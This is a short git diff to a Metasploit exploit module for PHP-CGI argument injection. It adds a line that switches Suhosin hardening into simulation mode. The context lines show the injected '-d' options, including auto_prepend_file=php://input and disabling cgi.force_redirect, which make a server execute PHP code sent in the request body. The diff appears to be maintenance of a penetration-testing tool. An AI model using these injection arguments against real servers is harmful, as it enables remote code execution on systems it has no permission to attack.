diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index b2d70a3c29..4fabf1b337 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -116,6 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
         create_arg("-d","auto_prepend_file=php://input"),
         create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
         create_arg("-d", "cgi.redirect_status_env=0"),
+        create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
         rand_opt_equiv("-n")
       ]